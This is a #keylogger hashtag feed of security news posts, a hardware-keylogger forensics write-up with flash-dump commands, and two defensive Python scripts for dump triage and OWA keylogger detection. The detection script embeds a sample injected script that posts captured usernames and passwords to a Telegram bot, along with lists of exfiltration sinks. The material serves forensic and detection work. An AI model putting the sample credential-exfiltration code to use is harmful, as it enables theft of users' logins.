Hashtag: #keylogger
Preview
This spy tool has been quietly stealing data for years - Help Net Security ESET researchers uncover the Sednit espionage toolkit targeting Ukrainian military personnel with two advanced implants since April 2024.

This spy tool has been quietly stealing data for years

📖 Read more: www.helpnetsecurity.com/2026/03/10/s...

#cybersecurity #cybersecuritynews #keylogger #cybercrime @esetresearch.bsky.social

0 0 0 0
Post image

ZeroDayRAT: the malware that hits Android and iOS
#Android #CryptoStealer #CyberSecurity #iOS #iPhone #Keylogger #Malware #Phishing #Privacy #Sicurezza #Smartphone #Smishing #Spyware #ZeroDayRAT
www.ceotech.it/zerodayrat-i...

0 0 0 0
Post image

Researchers Find 341 Malicious ClawHub
Read More: buff.ly/nejRZq9

#SupplyChainAttack #MaliciousExtensions #AIAppSecurity #ClawHub #AtomicStealer #Keylogger #ThreatResearch #SoftwareSecurity

0 0 0 0
Preview
What is a keylogger? How to detect and remove it in minutes Find out what a keylogger is: it can capture everything you type. Learn how they work and how anti-malware software can protect you.

What is a keylogger? How to detect and remove this threat in minutes

A spy recording all your keystrokes to steal passwords. It can be a physical USB device or invisible software. Learn how to find and remove them.

All details here: safelyo.com/what-is-a-ke...

#keylogger #Safelyo #EleanorVance

0 0 0 0
Post image

New Polymorphic Malware Undetected by Security Tools A new polymorphic malware identified by a security researcher earlier this week remains undetected by most security tools. Xavier Mertens wrote ...

#Cyber #News #Firewall #Daily #cryptomining #Cyber […]

[Original post on thecyberexpress.com]

0 0 0 0
Preview
Keyloggers Explained: How They Steal Your Keystrokes and How to Stop Them Hello readers, it's Samir, and today we're diving into a threat that's as sneaky as it is dangerous: keyloggers. Imagine someone looking over your shoulder, recording every single thing you type: passwords, bank details, private messages, everything. That's exactly what a keylogger does, but from the shadows of your own device. In this article, we'll break down what keyloggers are, how they manage to steal your keystrokes and, most importantly, how you can protect yourself from this invasive threat.

Keyloggers secretly capture everything you type. 🛡️ Learn how they work and, most importantly, how to detect and stop them before they steal your data. #CyberSecurity #Keylogger #Privacy

0 0 0 0
Preview
Alternate Data Streams (ADS): Hiding Malware in the File System. Alternate Data Streams are an elegant form of data hiding. No strange file in the filesystem, no executable, but ...

Alternate Data Streams (ADS): Hiding Malware in the File System.
ADS: when the threat hides in plain sight.

Are you a Windows user? Then try typing this in the search bar or run it from a terminal:....

www.aiutocomputerhelp.it?p=15448

#cybersicurezza #keylogger #NTFS

0 0 0 0
Preview
EggStreme Malware: Unpacking a New APT Framework Targeting a Philippine Military Company I'd like to thank my coauthors, Victor Vrabie, Adrian Schipor, and Martin Zugec, for their invaluable contributions to this research.

'EggStreme Malware: Unpacking a New APT Framework Targeting a Philippine Military Company'

www.bitdefender.com/en-gb/blog/b...

#CyberSecurity #APT #Fileless #DLLSideloading #Keylogger

0 0 0 0
Post image

EggStreme, fileless malware from a Chinese APT in APAC: gRPC C2, DLL sideloading, in-memory injection and advanced TTPs; analysis, impact and priority defences.

#apt #bitdefender #cina #EggStreme #fileless #keylogger #malware #sideloading
www.matricedigitale.it/2025/09/11/e...

0 0 0 0
Post image

APT attack against a military company in the Philippines

#AdvancedPersistentThreat @Bitdefender_DE #Cybersecurity #Cybersicherheit #EggStreme #FilelessMalware #Keylogger #Malware #Spionage @Bitdefender

netzpalaver.de/2025/...

1 1 0 0
Preview
I Turned a $4 Raspberry Pi Pico into a Hacking Weapon (Tutorial) 💻 Transform a cheap Raspberry Pi Pico into a powerful (and stealthy) USB Rubber Ducky for ethical hacking! This step-by-step tutorial shows you how to create a penetration testing device that can auto...

I Turned a $4 Raspberry Pi Pico into a Hacking Weapon (Tutorial)
twuai.com/search/rJWuc...
#usb #hardware #hacking #HID #rubberducky #raspberrypi #keylogger #cyberattack #redteam

1 0 0 0
Post image

77 malicious apps with over 19 million downloads discovered in the Google Play Store

#BankingTrojaner #Cybersecurity #Cybersicherheit #Keylogger #Malware #PlayStore #Security @Zscaler @Zscaler_DACH

netzpalaver.de/2025/...

0 0 0 0
Preview
New Malvertising Attack Spreads Crypto-Stealing PS1Bot Malware

🚨 Watch out as the new #PS1Bot malware steals crypto wallets, passwords, and sensitive data, spreading through #malvertising while evading detection.

Read: hackread.com/malvertising...

#CyberSecurity #Malware #Crypto #Keylogger

4 2 0 0
Preview
A Tale of Practical Keylogger Forensics

On a recent engagement, an interesting hardware side quest popped up. A client had found a keylogger and, naturally, we wanted to know what the adversary had seen and if we could gather any useful traces towards the perpetrator. Since our analysis included some twists, we decided to document parts of our process to perform a forensic analysis on a keylogger. We hope to shed some light on the forensic possibilities and encourage others to experiment with similar hardware.

## Passive Reconnaissance

Hardware keyloggers come in various shapes and sizes. The one we got, which was yanked from a computer in a public area, was no larger than a fingernail. To our surprise it was 3D printed, as the layers were visible. Of course, our first goal was to identify the device in front of us. What is it capable of? Is there any sort of documentation we can leverage? And although it looks just like any other keylogger, we started with some passive reconnaissance to confirm our first assumption. To our amusement, finding the exact model and documentation was just a single image search away. Simply taking a picture and using reverse image search, we immediately identified the "KeyGrabber Air". At this point we had a rough idea of what this device could do. Most notably, it could be used for:

* Capturing and storing keystrokes (no injection)
* Opening a WLAN to host a web interface that shows settings and keystrokes
* Connecting to a WLAN to send keystrokes via FTP or SMTP

## Active Reconnaissance

After powering on the device via the USB port, we noticed a new WLAN appear with the SSID "AP001". This matched the documentation we found earlier. However, the network required a password, and it was neither a common password such as "password" nor any other default credential we could find in the documentation. We also could not identify any sort of key combination (such as K+B+S) that would grant us administrative access, as has been the case with other keyloggers. Hence, we asked for permission to apply some more intrusive techniques.

Once we received a thumbs up from the client, we opened the case and got to the circuitry. As the figure above shows, there are only two core components on the board. On the bottom left you can see an ATMEL AT91SAM7S32 MU and on the right an ESP8285. The data lines from the USB ports are directly connected to the AT91SAM7S32, which indicates that this chip may be responsible for parsing the differential signals and extracting the key values. Of more interest to us is the ESP8285, which is a common chip for wireless applications and also connects to a small antenna on the PCB. Unfortunately, neither the connectors (golden circles) in the middle nor a direct connection with a Sensepeek PCBite to the ESP gave us access to the chip. Our assumption is that the passive components and connections on the board interfered with our attempts to communicate with the ESP8285 directly. Our goal was to hook up to UART, the debug interface of the chip, to dump its memory. Thus, we once again asked for permission to proceed and were given the green light to desolder the ESP.

**Word of caution**: make sure to check the datasheet of the components you want to desolder for allowed temperatures in advance to avoid the risk of damaging anything. A small nozzle and a rather low airflow prevent the passive components on the side from getting blown away. I can also recommend preheating the board to heat large ground pads.

Since the ESP is tiny and needs some passive components to function, we decided that it would be easiest to just install it on a developer board for easy access. Thus, we got ourselves a cheap dev kit like this: This set exposes the UART interface (board on the right) and includes a UART to USB converter (left). We desoldered the original chip, replaced it with the one we got from the keylogger and connected the board to a computer. Now we could use `esptool` to finally dump the memory of the ESP. Note that the ESP8285 has an internal flash memory. Other chips may use an external flash chip, so you may be able to access the storage directly and don't need to deal with the ESP/`esptool`. With `esptool` we need the baud rate (115200 is the default for this chip), the path to the USB device, the command (`read_flash`), a start address (0), the amount of bytes to read (in the case of the ESP8285 flash that is 1 megabyte) and a filename to store the contents.

```
$ esptool -b 115200 --port /dev/ttyUSB0 read_flash 0x0 0x100000 flash_1M_esp.bin
esptool.py v4.7.0
Serial port /dev/ttyUSB0
Connecting....
Detecting chip type... Unsupported detection protocol, switching and trying again
Connecting...
Detecting chip type... ESP8266
Chip is ESP8285H16
Features: WiFi, Embedded Flash
Crystal is 26MHz
Uploading stub...
Running stub...
Stub running...
315392 (30%)
```

When esptool finished without errors, we had the entire flash content in a file.

## Analysing the dump

As with any other binary file, we can save ourselves a lot of trouble by just extracting all readable strings and starting to analyse them before doing any reversing. However, the `strings` output on the binary showed tons of:

```
[N][+N][+N][+N]´[+N]´[+N][+N]´[+N][+N][+N][+N][+N]dckjhe^[+N]´x[+N]´[+N]´c[+N]´[+N]´[+N][+N][+N]a,[+N][F5]x[+N][+N][+N][+N]a,bsc[+N]a,[+N][+N][+N][+N]a,a,[+N][+N][+N][+N]a,[+N]c´[+N][+N][+N][+N]e^dc[+N][+N][+N][+N]´[+N][+N][+N][+N][+N][+N][+N][+N][+N][+N][+N]xx´[+N][+N][+N]bs[+N]a,a,[+N]c[+N][+N][+N]a,[+N][+N]c[+N][+N]a,[+N]bsa,[+N]´[+N]´[+N][+N]´[+N]´´[+N][+N][+N][+N][+N][+N]a,[+N][+N][+N]bsa,a,[+N]a,[+N][+N][+N][+N][+N]a,[+N]a,[+N][+N][+N]´[+N][+N][+N][+N]´[+N]´[+N]´[+N][+N]bsa,[+N]´[+N][+N][+N][+N]´[+N][+N][+N][+N][+N][+N]´[+N]a,[+N][+N][+N][+N]´[+N][+N][+N][+N][+N][+N]a,[+N][+N][+N][+N][+N][+N][+N][+N][+N]a,[+N][+N]´[+N][+N][+N][+N][+N][+N][+N][+N][+N][+N][+N][+N][+N][+N][+N][+N][+N][+N] [+N]x[PUp][+N][+N][+N][+N]bsa,bs[+N][+N]a,bs[+N]c[+N][+N]´[+N][+N]´[+N][+N][+N]a,[+N]ca,
```

At first we were optimistic. There were strings like `[LCtrl][Rgh]cbscbs[+N][LCtrl]` which seemed like valid keystrokes. But the longer we studied the output, the less sense we could make of it. We thought maybe the contents were encoded or maybe the memory got corrupted along the way. The initial feeling of success was followed by the depressing realisation that the output was useless. However, motivation quickly came back when we found the following intact and readable configuration in the `strings` output:

```
ap_name AP001
ap_password *******[redacted]
```

Unfortunately, it did not appear as if the adversary had specified any FTP or SMTP credentials. This could have been a great finding and a hint towards the identity of the perpetrator. However, equipped with the WiFi password, we would finally be able to access the keylogger dashboard.

Beware of rabbit holes. For quite some time we believed that the ESP firmware might hold some value and that we could potentially decode the magic log strings if we just reversed the application. We would just have to convert the binary back to an ELF and then apply Ghidra. In hindsight, that step was completely unnecessary and although we learned quite a bit about ESPs and ELFs, it was not nearly as efficient as what we did next.

## Put everything back together

We desoldered the ESP from the dev board and put it back on the keylogger. At last, we successfully connected to the WLAN of the keylogger. Following another quick read of the documentation, we navigated to `http://192.168.5.1` and finally: This was not what we anticipated. Either we had corrupted the filesystem or something weird was going on. Every page of logged keystrokes contained nothing but nonsense. However, the configuration we extracted was intact. And indeed, the dashboard displays all data as we would expect. Even the keyboard language was set up correctly. Still, apart from the WiFi password, we had no valuable insights for the investigation.

And then a random idea struck. What if the adversary had mixed up the USB devices and plugged in a mouse instead of a keyboard? So we placed the keylogger in a test environment, plugged in a keyboard and to our surprise it was logging without a single fault. Even bigger was the relief when we plugged in a mouse, moved and clicked it a few times, and looked at the logs again: Only for the last two lines we plugged in the mouse. And the output we see (notably lots of `[LCtrl]` and `[+N]`) shows significant similarities to the entire previous log. At this point we assessed that the perpetrator most likely did not exfiltrate any useful information this way. Instead, with a high chance the keylogger was plugged into a USB device other than an ordinary keyboard.

## Key Learnings

Keylogger forensics could uncover valuable information. Additionally, the process can be fairly straightforward. In this scenario we did not have to circumvent any physical protection mechanisms.

* Keep it simple (reverse image searching a simple photo of the keylogger led us straight to the relevant documentation)
* Even though the default password was changed, retrieving it from the keylogger was as easy as running `strings` on the memory dump
* Dumping the memory also allowed us to extract unencrypted log files and keylogger settings immediately
* The keylogger configuration may contain some interesting information such as credentials for SMTP, FTP or a WiFi hotspot that could lead you straight to the adversary
* Adversaries make mistakes too, for example placing a keylogger between a computer and the mouse cable

## Authors

* Justus Tartz
* Cass Rebbelin (Responsible Disclosure)

On a recent engagement a USB #keylogger was found. My colleague Cass and I analyzed the keylogger to find leads towards the threat actor. We have written down what we learned on our side quest:

research.hisolutions.com/2025/07/a-tale-of-practi...
#DEFIR #Forensics

0 0 0 0
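The two steps the write-up above leans on, extracting readable strings from the flash dump to recover the configuration and then telling mouse noise apart from real keystrokes, as one added triage script. This is example code, not HiSolutions' tooling: the sample dump bytes are constructed, the `ftp_`/`smtp_` prefixes and the `key=value` form are assumptions, and only the names `ap_name`/`ap_password` and the tokens `[+N]`/`[LCtrl]` come from the post.

```python
"""Triage a raw flash dump pulled from a hardware keylogger.

Added example (not HiSolutions' tooling). It reproduces the two steps the
write-up relied on: pull printable strings out of the dump, as `strings`
does, and look for the plaintext configuration, then score every string that
looks like a keystroke log for the tokens the authors saw when a mouse rather
than a keyboard was attached. SAMPLE_DUMP is constructed for this example;
only the key names ap_name/ap_password and the tokens [+N]/[LCtrl] come from
the write-up.
"""
import re

# Tokens that dominated the log once a mouse was on the cable (from the write-up).
MOUSE_NOISE = {"[+N]", "[LCtrl]"}
# A keystroke log is a stream of bracketed key names and single characters.
TOKEN_RE = re.compile(r"\[[^\]]+\]|.")
# Setting names worth pulling out of the dump; prefixes cover e.g. ftp_host (assumption).
CONFIG_PREFIXES = ("ap_name", "ap_password", "ftp_", "smtp_")
CONFIG_RE = re.compile(r"^([a-z_]+)[ =:]+(\S+)$")

# Constructed stand-in for a flash image: binary noise, the AP settings,
# a log segment recorded from a mouse and a log segment from a real keyboard.
SAMPLE_DUMP = (
    b"\x00\xff" * 8
    + b"ap_name\x00AP001\x00ap_password\x00S3cret-WLAN\x00"
    + b"\xe9\x00\x00\x00"
    + b"[+N][+N][LCtrl][+N]a,[+N][+N]bs[+N][+N][LCtrl][+N]\x00"
    + b"\xaa\xbb"
    + b"admin[Tab]Winter2025![Ent]\x00"
    + b"\x00" * 16
)


def extract_strings(blob: bytes, min_len: int = 4) -> list[str]:
    """Same idea as `strings -n min_len`: runs of printable ASCII."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, blob)]


def find_config(strs: list[str]) -> dict[str, str]:
    """Collect settings that appear either as 'key value' / 'key=value' in one
    string or as a bare key followed by its value in the next string (the
    NUL-separated layout seen in the dump)."""
    cfg: dict[str, str] = {}
    i = 0
    while i < len(strs):
        s = strs[i]
        m = CONFIG_RE.match(s)
        if m and m.group(1).startswith(CONFIG_PREFIXES):
            cfg[m.group(1)] = m.group(2)
        elif s.startswith(CONFIG_PREFIXES) and re.fullmatch(r"[a-z_]+", s) and i + 1 < len(strs):
            cfg[s] = strs[i + 1]
            i += 1  # value consumed
        i += 1
    return cfg


def noise_ratio(log: str) -> float:
    """Share of tokens that are mouse-noise tokens; 0.0 for an empty string."""
    tokens = TOKEN_RE.findall(log)
    if not tokens:
        return 0.0
    return sum(t in MOUSE_NOISE for t in tokens) / len(tokens)


def classify_logs(strs: list[str], threshold: float = 0.5) -> list[tuple[str, float, str]]:
    """For every string containing bracketed key names, return
    (string, noise ratio, 'mouse-noise' | 'keystrokes')."""
    out = []
    for s in strs:
        if "[" not in s:
            continue
        r = noise_ratio(s)
        out.append((s, r, "mouse-noise" if r >= threshold else "keystrokes"))
    return out


if __name__ == "__main__":
    found = extract_strings(SAMPLE_DUMP)
    print("config:", find_config(found))
    for s, r, verdict in classify_logs(found):
        print(f"{verdict:12s} noise={r:.2f}  {s}")
```

Run it against a real image with `extract_strings(Path("flash_1M_esp.bin").read_bytes())`; the 0.5 threshold is a starting point, since a genuine keyboard log can legitimately contain `[LCtrl]` but is never dominated by `[+N]`.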
Original post on systemweakness.com

[CyberDefenders Write-up] AndroidBreach (Keylogger disguised as Fake Discord Nitro) CyberDefenders | Blue Team Training Platform Scenario At BrightWave Company, a data breach occurred due to an em...

#malware-analysis #keylogger #mobile-application #blue-team #cyberdefender

Origin | Interest | […]

0 0 0 0
Preview
Keylogger Injection Targets Microsoft Exchange Servers

Keylogging malware is particularly dangerous as it is often designed to steal login passwords or other sensitive information from victims. When you add a compromised Exchange server to the mix, it makes things significantly worse for any organisation.

Positive Technologies researchers recently published a new report on a keylogger-based campaign that targets organisations worldwide. The effort, which is identical to an attack uncovered in 2024, targets compromised Microsoft Exchange Server installations belonging to 65 victims in 26 nations.

The attackers infiltrated Exchange servers by exploiting well-known security flaws or using completely novel techniques. After getting access, the hackers installed JavaScript keyloggers to intercept login credentials from the organisation's Outlook on the Web page.

OWA is the web version of Microsoft Outlook and is integrated into both the Exchange Server platform and the Exchange Online service within Microsoft 365. According to the report, the JavaScript keyloggers gave the attackers persistence on the compromised servers and went unnoticed for months. The researchers uncovered various keyloggers and classified them into two types: those meant to save captured inputs to a file on the local server that could be accessed from the internet later, and those that transferred stolen credentials across the global network using DNS tunnels or Telegram bots. The files containing the logged data were properly labelled to help attackers identify the compromised organisation. PT researchers explained that most of the affected Exchange systems were owned by government agencies. A number of other victims worked in industries like logistics, industry and IT. The majority of infections were found in Taiwan, Vietnam and Russia; nine infected companies were found in Russia alone.

The researchers emphasised that a huge number of Exchange servers remain vulnerable to well-known security issues. The PT experts encouraged companies to regard security flaws as major issues and implement adequate vulnerability management strategies. Furthermore, organisations that use the Microsoft platform should implement up-to-date web applications and security measures to detect malicious network activities. It is also a good idea to analyse user authentication files on a regular basis for potentially malicious code.

Keylogger Injection Targets Microsoft Exchange Servers #CyberAttacks #keylogger #MicrosoftExchange

0 0 0 0
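The closing advice above, checking the authentication pages for injected code, as an added scanner; it is example code and not from the Positive Technologies report or the article. It flags an inline `<script>` block only when the block both reads the logon form's credential fields and contains a sink that moves the data off the page (fetch/XHR/beacon, the Telegram Bot API, or an image/location load whose hostname can carry the data, which is how browser-side script ends up tunnelling over DNS). The field ids `username`/`password`, the file globs, the install path in the comment and the sample page are assumptions constructed for the example.

```python
"""Scan Outlook on the Web logon page sources for injected JavaScript keyloggers.

Added example; not from the Positive Technologies report or the article.
The campaign described there planted JavaScript in the OWA logon page that
captured what users typed and either wrote it to a server-side file or sent
it out through DNS or Telegram bots. The heuristic flags an inline <script>
block only when it both reads the logon form's credential fields and contains
a sink that moves data off the page. Field ids, the file globs and
SAMPLE_LOGON_PAGE are assumptions constructed for the example; confirm hits
against a known-good copy of the file from a clean Exchange install.
"""
import re
from pathlib import Path

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)

# Ways a script can get at what the user typed into the logon form.
CREDENTIAL_READS = [
    r"getElementById\(\s*['\"](?:username|password)['\"]",
    r"\.password\b",
    r"input\[type=['\"]?password",
    r"addEventListener\(\s*['\"](?:keydown|keyup|keypress|submit)['\"]",
    r"\bonsubmit\s*=",
    r"\bonkey(?:down|up|press)\s*=",
]
# Ways captured data can leave the page. An image or location load with the
# data folded into the hostname is the browser-side form of a DNS tunnel, so
# `.src =` and location assignments count as sinks too.
EXFIL_SINKS = [
    r"api\.telegram\.org",
    r"\bsendMessage\b",
    r"\bfetch\s*\(",
    r"XMLHttpRequest",
    r"navigator\.sendBeacon",
    r"new\s+Image\s*\(",
    r"\.src\s*=",
    r"(?:document|window)\.location\s*=",
]

# Constructed page: one benign helper block, then an injected block that hooks
# the submit event and posts both fields to a Telegram bot.
SAMPLE_LOGON_PAGE = """<html><head><title>Outlook</title>
<script type="text/javascript">
function clkLgn(){ var f=document.forms[0]; if(f.username.value==""){return false;} f.submit(); }
</script></head>
<body><form action="/owa/auth.owa" method="post" onsubmit="return clkLgn();">
<input id="username" name="username"><input id="password" name="password" type="password">
</form>
<script>
document.forms[0].addEventListener("submit",function(){
 var u=document.getElementById("username").value,p=document.getElementById("password").value;
 fetch("https://api.telegram.org/bot<token>/sendMessage?chat_id=1&text="+encodeURIComponent(u+":"+p));
});
</script></body></html>"""


def scan_page(html: str) -> list[dict]:
    """One finding per inline script block that reads credentials AND has an
    exfiltration sink. Script blocks are numbered from 1 in page order."""
    findings = []
    for n, m in enumerate(SCRIPT_RE.finditer(html), 1):
        body = m.group(1)
        reads = [p for p in CREDENTIAL_READS if re.search(p, body, re.I)]
        sinks = [p for p in EXFIL_SINKS if re.search(p, body, re.I)]
        if reads and sinks:
            findings.append({
                "script": n,
                "reads": reads,
                "sinks": sinks,
                "snippet": " ".join(body.split())[:100],
            })
    return findings


def scan_tree(root: Path, patterns=("*.aspx", "*.js", "*.html")) -> dict[str, list[dict]]:
    """Walk the OWA/ECP front-end directories (root is the caller's choice; on
    a default install the logon page sits under FrontEnd\\HttpProxy\\owa\\auth)
    and report every file with at least one finding."""
    report = {}
    for pattern in patterns:
        for path in root.rglob(pattern):
            hits = scan_page(path.read_text(encoding="utf-8", errors="replace"))
            if hits:
                report[str(path)] = hits
    return report


if __name__ == "__main__":
    for f in scan_page(SAMPLE_LOGON_PAGE):
        print(f"script #{f['script']}: reads={f['reads']} sinks={f['sinks']}")
        print("  ", f["snippet"])
```

Requiring both a credential read and a sink keeps the stock logon helper (which touches the form but only submits it) out of the results; a keylogger that writes to a server-side file still needs a request to reach that server-side component, so the same sinks apply. Treat a hit as a lead to diff against a clean install, not as proof on its own.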
Preview
Hackers Target Over 70 Microsoft Exchange Servers to Steal Credentials via Keyloggers Hackers target Microsoft Exchange servers worldwide, injecting keyloggers to steal credentials from victims in 26 countries.

Hackers hit 65 Microsoft Exchange servers with JavaScript keyloggers, stealing credentials across 26 countries. Target: outdated, exposed systems.
#CyberSecurity #MicrosoftExchange #Infosec #Keylogger #ThreatIntel thehackernews.com/2025/06/hack...

1 0 0 0
Post image

Keylogger on Exchange and FileFix: advanced threats via JavaScript and social engineering target web logins and uploads for credential theft and local attacks.

#FileFix #furtocredenziali #javascript #keylogger #MicrosoftExchange #Powershell #SocialEngineering
www.matricedigitale.it/2025/06/24/a...

0 0 0 0